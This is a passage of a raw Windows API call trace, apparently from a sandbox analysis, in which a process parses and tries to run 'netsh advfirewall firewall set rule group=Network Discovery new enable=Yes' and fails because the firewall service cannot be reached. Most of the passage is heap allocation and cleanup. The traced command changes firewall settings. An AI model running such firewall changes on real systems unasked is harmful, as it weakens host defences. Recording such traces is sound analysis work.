Size=0xc) returned 0x54f448 [0132.921] GetProcessHeap () returned 0x4f0000 [0132.921] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x4) returned 0x539698 [0132.921] wcscpy_s (in: _Destination=0x539698, _SizeInWords=0x2, _Source="=" | out: _Destination="=") returned 0x0 [0132.921] GetProcessHeap () returned 0x4f0000 [0132.921] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc) returned 0x54f460 [0132.921] GetProcessHeap () returned 0x4f0000 [0132.921] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x5396a8 [0132.921] wcscpy_s (in: _Destination=0x5396a8, _SizeInWords=0x4, _Source="Yes" | out: _Destination="Yes") returned 0x0 [0132.921] GetProcessHeap () returned 0x4f0000 [0132.922] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x54c248 | out: hHeap=0x4f0000) returned 1 [0132.922] GetProcessHeap () returned 0x4f0000 [0132.922] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x540f28 | out: hHeap=0x4f0000) returned 1 [0132.922] GetProcessHeap () returned 0x4f0000 [0132.922] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x53aa00 | out: hHeap=0x4f0000) returned 1 [0132.922] GetProcessHeap () returned 0x4f0000 [0132.922] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x18) returned 0x53aa00 [0132.922] _wcsnicmp (_String1="firewall", _String2="dump", _MaxCount=0x8) returned 2 [0132.922] _wcsnicmp (_String1="firewall", _String2="help", _MaxCount=0x8) returned -2 [0132.922] _wcsnicmp (_String1="firewall", _String2="?", _MaxCount=0x8) returned 39 [0132.922] _wcsnicmp (_String1="firewall", _String2="reset", _MaxCount=0x8) returned -12 [0132.922] _wcsnicmp (_String1="firewall", _String2="import", _MaxCount=0x8) returned -3 [0132.922] _wcsnicmp (_String1="firewall", _String2="export", _MaxCount=0x8) returned 1 [0132.922] _wcsnicmp (_String1="firewall", _String2="consec", _MaxCount=0x8) returned 3 [0132.922] _wcsnicmp (_String1="firewall", _String2="firewall", _MaxCount=0x8) returned 0 [0132.922] GetProcessHeap () returned 0x4f0000 [0132.922] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc) returned 0x540f28 [0132.922] GetProcessHeap () returned 0x4f0000 [0132.922] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc) returned 0x54f478 [0132.922] GetProcessHeap () returned 0x4f0000 [0132.922] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x9e) returned 0x54fc00 [0132.922] GetProcessHeap () returned 0x4f0000 [0132.922] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc) returned 0x54f490 [0132.922] GetProcessHeap () returned 0x4f0000 [0132.922] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc) returned 0x54f4a8 [0132.922] wcscpy_s (in: _Destination=0x54f4a8, _SizeInWords=0x6, _Source="netsh" | out: _Destination="netsh") returned 0x0 [0132.922] GetProcessHeap () returned 0x4f0000 [0132.922] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc) returned 0x54f4c0 [0132.922] GetProcessHeap () returned 0x4f0000 [0132.922] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x18) returned 0x53aa40 [0132.922] wcscpy_s (in: _Destination=0x53aa40, _SizeInWords=0xc, _Source="advfirewall" | out: _Destination="advfirewall") returned 0x0 [0132.922] GetProcessHeap () returned 0x4f0000 [0132.923] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc) returned 0x54f4d8 [0132.923] GetProcessHeap () returned 0x4f0000 [0132.923] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x12) returned 0x53aa60 [0132.923] wcscpy_s (in: _Destination=0x53aa60, _SizeInWords=0x9, _Source="firewall" | out: _Destination="firewall") returned 0x0 [0132.923] GetProcessHeap () returned 0x4f0000 [0132.923] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc) returned 0x54f4f0 [0132.923] GetProcessHeap () returned 0x4f0000 [0132.923] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x5396b8 [0132.923] wcscpy_s (in: _Destination=0x5396b8, _SizeInWords=0x4, _Source="set" | out: _Destination="set") returned 0x0 [0132.923] GetProcessHeap () returned 0x4f0000 [0132.923] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc) returned 0x54f508 [0132.923] GetProcessHeap () returned 0x4f0000 [0132.923] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xa) returned 0x54f520 [0132.923] wcscpy_s (in: _Destination=0x54f520, _SizeInWords=0x5, _Source="rule" | out: _Destination="rule") returned 0x0 [0132.923] GetProcessHeap () returned 0x4f0000 [0132.923] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc) returned 0x54f538 [0132.923] GetProcessHeap () returned 0x4f0000 [0132.923] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x34) returned 0x536898 [0132.923] wcscpy_s (in: _Destination=0x536898, _SizeInWords=0x1a, _Source="\"group=Network Discovery\"" | out: _Destination="\"group=Network Discovery\"") returned 0x0 [0132.923] GetProcessHeap () returned 0x4f0000 [0132.923] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc) returned 0x54f550 [0132.923] GetProcessHeap () returned 0x4f0000 [0132.923] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x5396c8 [0132.923] wcscpy_s (in: _Destination=0x5396c8, _SizeInWords=0x4, _Source="new" | out: _Destination="new") returned 0x0 [0132.923] GetProcessHeap () returned 0x4f0000 [0132.923] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc) returned 0x54f568 [0132.923] GetProcessHeap () returned 0x4f0000 [0132.923] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xe) returned 0x54f580 [0132.923] wcscpy_s (in: _Destination=0x54f580, _SizeInWords=0x7, _Source="enable" | out: _Destination="enable") returned 0x0 [0132.923] GetProcessHeap () returned 0x4f0000 [0132.923] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc) returned 0x54f598 [0132.923] GetProcessHeap () returned 0x4f0000 [0132.923] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x4) returned 0x5396d8 [0132.924] wcscpy_s (in: _Destination=0x5396d8, _SizeInWords=0x2, _Source="=" | out: _Destination="=") returned 0x0 [0132.924] GetProcessHeap () returned 0x4f0000 [0132.924] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc) returned 0x54f5b0 [0132.924] GetProcessHeap () returned 0x4f0000 [0132.924] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x5396e8 [0132.924] wcscpy_s (in: _Destination=0x5396e8, _SizeInWords=0x4, _Source="Yes" | out: _Destination="Yes") returned 0x0 [0132.924] GetProcessHeap () returned 0x4f0000 [0132.924] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x54fc00 | out: hHeap=0x4f0000) returned 1 [0132.924] GetProcessHeap () returned 0x4f0000 [0132.924] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x54f478 | out: hHeap=0x4f0000) returned 1 [0132.924] GetProcessHeap () returned 0x4f0000 [0132.924] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x53aa60 | out: hHeap=0x4f0000) returned 1 [0132.924] GetProcessHeap () returned 0x4f0000 [0132.924] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x12) returned 0x53aa60 [0132.924] _wcsnicmp (_String1="set", _String2="dum", _MaxCount=0x3) returned 15 [0132.924] _wcsnicmp (_String1="set", _String2="hel", _MaxCount=0x3) returned 11 [0132.924] _wcsnicmp (_String1="set", _String2="?", _MaxCount=0x3) returned 52 [0132.924] _wcsnicmp (_String1="set", _String2="add", _MaxCount=0x3) returned 18 [0132.924] _wcsnicmp (_String1="set", _String2="del", _MaxCount=0x3) returned 15 [0132.924] _wcsnicmp (_String1="set", _String2="set", _MaxCount=0x3) returned 0 [0132.924] _wcsnicmp (_String1="rule", _String2="help", _MaxCount=0x4) returned 10 [0132.924] _wcsnicmp (_String1="rule", _String2="?", _MaxCount=0x4) returned 51 [0132.924] wcstok (in: _String="rule", _Delimiter=" ", _Context=0x0 | out: _String="rule", _Context=0x0) returned="rule" [0133.224] _wcsnicmp (_String1="rule", _String2="rule", _MaxCount=0x4) returned 0 [0133.224] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x0 | out: _String=0x0, _Context=0x0) returned 0x0 [0133.225] MatchTagsInCmdLine () returned 0x0 [0133.225] wcspbrk (_String="group=Network Discovery", _Control="=") returned="=Network Discovery" [0133.225] GetProcessHeap () returned 0x4f0000 [0133.225] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x30) returned 0x54b010 [0133.225] wcscpy_s (in: _Destination=0x54b010, _SizeInWords=0x18, _Source="group=Network Discovery" | out: _Destination="group=Network Discovery") returned 0x0 [0133.225] wcstok (in: _String="group=Network Discovery", _Delimiter="=", _Context=0x54b010 | out: _String="group", _Context=0x54b010) returned="group" [0133.225] _wcsnicmp (_String1="group", _String2="Name", _MaxCount=0x5) returned -7 [0133.225] _wcsnicmp (_String1="group", _String2="Direc", _MaxCount=0x5) returned 3 [0133.225] _wcsnicmp (_String1="group", _String2="Profi", _MaxCount=0x5) returned -9 [0133.225] _wcsnicmp (_String1="group", _String2="Local", _MaxCount=0x5) returned -5 [0133.225] _wcsnicmp (_String1="group", _String2="Remot", _MaxCount=0x5) returned -11 [0133.225] _wcsnicmp (_String1="group", _String2="Local", _MaxCount=0x5) returned -5 [0133.225] _wcsnicmp (_String1="group", _String2="Remot", _MaxCount=0x5) returned -11 [0133.225] _wcsnicmp (_String1="group", _String2="Progr", _MaxCount=0x5) returned -9 [0133.225] _wcsnicmp (_String1="group", _String2="Proto", _MaxCount=0x5) returned -9 [0133.225] _wcsnicmp (_String1="group", _String2="Servi", _MaxCount=0x5) returned -12 [0133.225] _wcsnicmp (_String1="group", _String2="Group", _MaxCount=0x5) returned 0 [0133.225] wcscpy_s (in: _Destination=0x536858, _SizeInWords=0x18, _Source="Network Discovery" | out: _Destination="Network Discovery") returned 0x0 [0133.225] GetProcessHeap () returned 0x4f0000 [0133.225] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x54b010 | out: hHeap=0x4f0000) returned 1 [0133.512] LoadStringW (in: hInstance=0x71890000, uID=0x200032cb, lpBuffer=0x243410, cchBufferMax=8192 | out: lpBuffer="\nAn error occurred while attempting to contact the Windows Firewall service. Make sure that the service is running and try your request again.\n") returned 0x90 [0133.518] FormatMessageW (in: dwFlags=0x500, lpSource=0x243410, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x24340c, nSize=0x0, Arguments=0x243408 | out: lpBuffer="ﰀT\nAn error occurred while attempting to contact the Windows Firewall service. Make sure that the service is running and try your request again.\n") returned 0x92 [0133.518] GetStdHandle (nStdHandle=0xfffffff5) returned 0x32c [0133.518] GetConsoleOutputCP () returned 0x1b5 [0133.519] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\nAn error occurred while attempting to contact the Windows Firewall service. Make sure that the service is running and try your request again.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 147 [0133.519] GetProcessHeap () returned 0x4f0000 [0133.519] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x93) returned 0x54c648 [0133.519] GetConsoleOutputCP () returned 0x1b5 [0133.519] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\nAn error occurred while attempting to contact the Windows Firewall service. Make sure that the service is running and try your request again.\r\n", cchWideChar=-1, lpMultiByteStr=0x54c648, cbMultiByte=147, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nAn error occurred while attempting to contact the Windows Firewall service. Make sure that the service is running and try your request again.\r\n", lpUsedDefaultChar=0x0) returned 147 [0133.519] WriteFile (in: hFile=0x32c, lpBuffer=0x54c648, nNumberOfBytesToWrite=0x92, lpNumberOfBytesWritten=0x2433dc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2433dc, lpOverlapped=0x0) returned 0 [0133.519] GetProcessHeap () returned 0x4f0000 [0133.519] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x54c648 | out: hHeap=0x4f0000) returned 1 [0133.519] LocalFree (hMem=0x54fc00) returned 0x0 [0133.521] FormatMessageW (in: dwFlags=0x500, lpSource=0x15f2008, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0x247944, nSize=0x0, Arguments=0x247958 | out: lpBuffer="T祜$㚪ş ş祘$票$票$㙻ş ş禰$ダş") returned 0x2 [0133.521] GetStdHandle (nStdHandle=0xfffffff5) returned 0x32c [0133.521] GetConsoleOutputCP () returned 0x1b5 [0133.521] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 3 [0133.521] GetProcessHeap () returned 0x4f0000 [0133.521] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x3) returned 0x54c260 [0133.521] GetConsoleOutputCP () returned 0x1b5 [0133.521] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x54c260, cbMultiByte=3, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0133.521] WriteFile (in: hFile=0x32c, lpBuffer=0x54c260, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x247920, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x247920, lpOverlapped=0x0) returned 0 [0133.521] GetProcessHeap () returned 0x4f0000 [0133.521] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x54c260 | out: hHeap=0x4f0000) returned 1 [0133.521] LocalFree (hMem=0x54f5c8) returned 0x0 [0133.521] GetProcessHeap () returned 0x4f0000 [0133.521] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x540ef8 | out: hHeap=0x4f0000) returned 1 [0133.521] GetProcessHeap () returned 0x4f0000 [0133.522] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x53a980 | out: hHeap=0x4f0000) returned 1 [0133.522] GetProcessHeap () returned 0x4f0000 [0133.522] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x53a9c0 | out: hHeap=0x4f0000) returned 1 [0133.522] GetProcessHeap () returned 0x4f0000 [0133.522] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x539648 | out: hHeap=0x4f0000) returned 1 [0133.522] GetProcessHeap () returned 0x4f0000 [0133.522] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x540ec8 | out: hHeap=0x4f0000) returned 1 [0133.522] GetProcessHeap () returned 0x4f0000 [0133.522] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x536858 | out: hHeap=0x4f0000) returned 1 [0133.522] GetProcessHeap () returned 0x4f0000 [0133.522] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x539668 | out: hHeap=0x4f0000) returned 1 [0133.522] GetProcessHeap () returned 0x4f0000 [0133.522] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x53a9e0 | out: hHeap=0x4f0000) returned 1 [0133.522] GetProcessHeap () returned 0x4f0000 [0133.522] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x54afd8 | out: hHeap=0x4f0000) returned 1 [0133.522] GetProcessHeap () returned 0x4f0000 [0133.522] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x53a960 | out: hHeap=0x4f0000) returned 1 [0133.522] GetProcessHeap () returned 0x4f0000 [0133.522] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x540dc0 | out: hHeap=0x4f0000) returned 1 [0133.522] GetProcessHeap () returned 0x4f0000 [0133.522] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x53a9a0 | out: hHeap=0x4f0000) returned 1 [0133.522] GetProcessHeap () returned 0x4f0000 [0133.522] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x540d78 | out: hHeap=0x4f0000) returned 1 [0133.522] GetProcessHeap () returned 0x4f0000 [0133.522] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x539658 | out: hHeap=0x4f0000) returned 1 [0133.522] GetProcessHeap () returned 0x4f0000 [0133.522] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x540dd8 | out: hHeap=0x4f0000) returned 1 [0133.522] GetProcessHeap () returned 0x4f0000 [0133.522] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x540f10 | out: hHeap=0x4f0000) returned 1 [0133.522] GetProcessHeap () returned 0x4f0000 [0133.522] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x540df0 | out: hHeap=0x4f0000) returned 1 [0133.522] GetProcessHeap () returned 0x4f0000 [0133.522] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x540e20 | out: hHeap=0x4f0000) returned 1 [0133.522] GetProcessHeap () returned 0x4f0000 [0133.523] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x540e08 | out: hHeap=0x4f0000) returned 1 [0133.523] GetProcessHeap () returned 0x4f0000 [0133.523] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x539608 | out: hHeap=0x4f0000) returned 1 [0133.523] GetProcessHeap () returned 0x4f0000 [0133.523] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x540e38 | out: hHeap=0x4f0000) returned 1 [0133.523] GetProcessHeap () returned 0x4f0000 [0133.523] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x53ec60 | out: hHeap=0x4f0000) returned 1 [0133.523] GetProcessHeap () returned 0x4f0000 [0133.523] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x540e68 | out: hHeap=0x4f0000) returned 1 [0133.523] GetProcessHeap () returned 0x4f0000 [0133.523] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x539618 | out: hHeap=0x4f0000) returned 1 [0133.523] GetProcessHeap () returned 0x4f0000 [0133.523] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x540e80 | out: hHeap=0x4f0000) returned 1 [0133.523] GetProcessHeap () returned 0x4f0000 [0133.523] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x540e50 | out: hHeap=0x4f0000) returned 1 [0133.523] GetProcessHeap () returned 0x4f0000 [0133.523] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x540e98 | out: hHeap=0x4f0000) returned 1 [0133.523] GetProcessHeap () returned 0x4f0000 [0133.523] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x539628 | out: hHeap=0x4f0000) returned 1 [0133.523] GetProcessHeap () returned 0x4f0000 [0133.523] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x540eb0 | out: hHeap=0x4f0000) returned 1 [0133.523] GetProcessHeap () returned 0x4f0000 [0133.523] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x539638 | out: hHeap=0x4f0000) returned 1 [0133.523] GetProcessHeap () returned 0x4f0000 [0133.523] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x540ee0 | out: hHeap=0x4f0000) returned 1 [0133.523] GetProcessHeap () returned 0x4f0000 [0133.523] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x540d60 | out: hHeap=0x4f0000) returned 1 [0133.523] GetProcessHeap () returned 0x4f0000 [0133.523] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x540da8 | out: hHeap=0x4f0000) returned 1 [0133.523] GetProcessHeap () returned 0x4f0000 [0133.523] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x540d90 | out: hHeap=0x4f0000) returned 1 [0133.523] GetProcessHeap () returned 0x4f0000 [0133.524] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x540d48 | out: hHeap=0x4f0000) returned 1 [0136.972] GetProcessHeap () returned 0x4f0000 [0136.972] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x52edb0 | out: hHeap=0x4f0000) returned 1 [0136.972] FreeLibrary (hLibModule=0x15f0000) returned 1 [0136.972] FreeLibrary (hLibModule=0x74650000) returned 1 [0136.976] free (_Block=0x7c3f78) [0136.977] LocalAlloc (uFlags=0x40, uBytes=0x178) returned 0x509388 [0136.977] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x508b48 [0136.977] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x54f688 [0136.977] free (_Block=0x7c3ef8) [0136.978] free (_Block=0x0) [0136.978] free (_Block=0x7c13c0) [0136.978] free (_Block=0x7c3f10) [0136.978] free (_Block=0x7c3f58) [0136.978] LocalAlloc (uFlags=0x40, uBytes=0x84) returned 0x507478 [0136.979] free (_Block=0x7c2610) [0136.980] GetModuleHandleA (lpModuleName="MSVCRT.DLL") returned 0x76f90000 [0136.980] FreeLibrary (hLibModule=0x76f90000) returned 1 [0136.980] GlobalHandle (pMem=0x507638) returned 0x430004 [0136.980] GlobalUnlock (hMem=0x430004) returned 0 [0136.985] FreeLibrary (hLibModule=0x71af0000) returned 1 [0136.985] FreeLibrary (hLibModule=0x71ad0000) returned 1 [0136.987] FreeLibrary (hLibModule=0x71a00000) returned 1 [0137.003] FreeLibrary (hLibModule=0x719a0000) returned 1 [0137.003] FreeLibrary (hLibModule=0x71970000) returned 1 [0137.004] FreeLibrary (hLibModule=0x71890000) returned 1 [0137.005] FreeLibrary (hLibModule=0x71860000) returned 1 [0137.005] FreeLibrary (hLibModule=0x71800000) returned 1 [0137.007] FreeLibrary (hLibModule=0x717a0000) returned 1 [0137.017] FreeLibrary (hLibModule=0x716e0000) returned 1 [0137.028] FreeLibrary (hLibModule=0x71450000) returned 1 [0137.029] FreeLibrary (hLibModule=0x71430000) returned 1 [0137.029] FreeLibrary (hLibModule=0x71210000) returned 1 [0137.786] FreeLibrary (hLibModule=0x71cb0000) returned 1 [0138.246] FreeLibrary (hLibModule=0x71c80000) returned 1 [0138.326] FreeLibrary (hLibModule=0x741b0000) returned 1 [0159.038] FreeLibrary (hLibModule=0x70b10000) returned 1 [0159.040] GetProcessHeap () returned 0x4f0000 [0159.040] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x51d958 | out: hHeap=0x4f0000) returned 1 [0159.040] GetProcessHeap () returned 0x4f0000 [0159.040] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x504708 | out: hHeap=0x4f0000) returned 1 [0159.040] GetProcessHeap () returned 0x4f0000 [0159.040] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5060e0 | out: hHeap=0x4f0000) returned 1 [0159.040] GetProcessHeap () returned 0x4f0000 [0159.040] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5060f0 | out: hHeap=0x4f0000) returned 1 [0159.040] GetProcessHeap () returned 0x4f0000 [0159.040] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506100 | out: hHeap=0x4f0000) returned 1 [0159.040] GetProcessHeap () returned 0x4f0000 [0159.040] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506110 | out: hHeap=0x4f0000) returned 1 [0159.040] GetProcessHeap () returned 0x4f0000 [0159.040] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506120 | out: hHeap=0x4f0000) returned 1 [0159.041] GetProcessHeap () returned 0x4f0000 [0159.041] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506130 | out: hHeap=0x4f0000) returned 1 [0159.041] GetProcessHeap () returned 0x4f0000 [0159.041] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506140 | out: hHeap=0x4f0000) returned 1 [0159.041] GetProcessHeap () returned 0x4f0000 [0159.041] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506150 | out: hHeap=0x4f0000) returned 1 [0159.041] GetProcessHeap () returned 0x4f0000 [0159.041] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506160 | out: hHeap=0x4f0000) returned 1 [0159.041] GetProcessHeap () returned 0x4f0000 [0159.041] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506170 | out: hHeap=0x4f0000) returned 1 [0159.041] GetProcessHeap () returned 0x4f0000 [0159.041] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506180 | out: hHeap=0x4f0000) returned 1 [0159.041] GetProcessHeap () returned 0x4f0000 [0159.041] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5061a8 | out: hHeap=0x4f0000) returned 1 [0159.041] GetProcessHeap () returned 0x4f0000 [0159.041] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5061b8 | out: hHeap=0x4f0000) returned 1 [0159.041] GetProcessHeap () returned 0x4f0000 [0159.041] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5061c8 | out: hHeap=0x4f0000) returned 1 [0159.041] GetProcessHeap () returned 0x4f0000 [0159.041] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5061d8 | out: hHeap=0x4f0000) returned 1 [0159.041] GetProcessHeap () returned 0x4f0000 [0159.041] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5061e8 | out: hHeap=0x4f0000) returned 1 [0159.041] GetProcessHeap () returned 0x4f0000 [0159.041] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5061f8 | out: hHeap=0x4f0000) returned 1 [0159.041] GetProcessHeap () returned 0x4f0000 [0159.041] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506208 | out: hHeap=0x4f0000) returned 1 [0159.041] GetProcessHeap () returned 0x4f0000 [0159.041] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506218 | out: hHeap=0x4f0000) returned 1 [0159.041] GetProcessHeap () returned 0x4f0000 [0159.041] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506228 | out: hHeap=0x4f0000) returned 1 [0159.041] GetProcessHeap () returned 0x4f0000 [0159.041] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506238 | out: hHeap=0x4f0000) returned 1 [0159.041] GetProcessHeap () returned 0x4f0000 [0159.042] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506248 | out: hHeap=0x4f0000) returned 1 [0159.042] GetProcessHeap () returned 0x4f0000 [0159.042] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506258 | out: hHeap=0x4f0000) returned 1 [0159.042] GetProcessHeap () returned 0x4f0000 [0159.042] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506268 | out: hHeap=0x4f0000) returned 1 [0159.042] GetProcessHeap () returned 0x4f0000 [0159.042] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506278 | out: hHeap=0x4f0000) returned 1 [0159.042] GetProcessHeap () returned 0x4f0000 [0159.042] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506288 | out: hHeap=0x4f0000) returned 1 [0159.042] GetProcessHeap () returned 0x4f0000 [0159.042] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x506298 | out: hHeap=0x4f0000) returned 1 [0159.042] GetProcessHeap () returned 0x4f0000 [0159.042] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5062a8 | out: hHeap=0x4f0000) returned 1 [0159.042] GetProcessHeap () returned 0x4f0000 [0159.042] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5062b8 | out: hHeap=0x4f0000) returned 1 [0159.042] GetProcessHeap () returned 0x4f0000 [0159.042] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5062c8 | out: hHeap=0x4f0000) returned 1 [0159.042] GetProcessHeap () returned 0x4f0000 [0159.042] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5062d8 | out: hHeap=0x4f0000) returned 1 [0159.042] GetProcessHeap () returned 0x4f0000 [0159.042] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5062e8 | out: hHeap=0x4f0000) returned 1 [0159.042] GetProcessHeap () returned 0x4f0000 [0159.042] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, 